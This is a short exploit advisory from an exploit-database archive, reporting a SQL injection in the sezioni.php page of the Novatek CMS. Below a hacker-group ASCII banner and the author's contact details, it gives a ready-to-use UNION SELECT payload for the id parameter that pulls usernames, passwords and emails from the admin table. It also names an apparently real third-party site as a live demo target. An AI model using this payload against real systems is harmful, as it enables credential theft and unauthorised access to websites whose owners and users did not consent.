Novatek SQL Injection

2011-09-01T00:00:00
ID PACKETSTORM:104687
Type packetstorm
Reporter OuTLaWz
Modified 2011-09-01T00:00:00

Description

                                        
                                            `=================================================  
Novatek (sezioni.php) SQL Injection Vulnerability  
=================================================  
  
  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################### 1  
0 I'm The_Exploited member from Inj3ct0r Team 1  
1 ########################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+] Discovered By: The_Exploited  
  
@Title: Novatek (sezioni.php) SQL Injection Vulnerability  
  
@Author: OuTLaWz aka The_Exploited aka l3d aka Spoof  
  
@Mail: outlawz.inj3ct0r@gmail.com  
  
@Yahoo Messenger: user_31337@yahoo.com  
  
@Site: WwW.SecuritySpl0its.CoM  
  
@Path: http://www.mysite.com/sezioni.php?titolo=news&id=[SQL]  
  
@SQL Injection: -null+union+all+select+null,null,null,null,concat(user,0x3a,psw,0x3a,email),null,null,null,null,null,null+from+admin  
  
@Demo: http://www.mais-onlus.org/sezioni.php?titolo=news&id=[SQL]  
  
@Platform: PHP  
  
@CMS Version: All  
  
@CMS Download: http://www.nova-tek.it/  
  
// 2Pac R.I.P.  
  
# 1337day.com [2010-07-06]  
`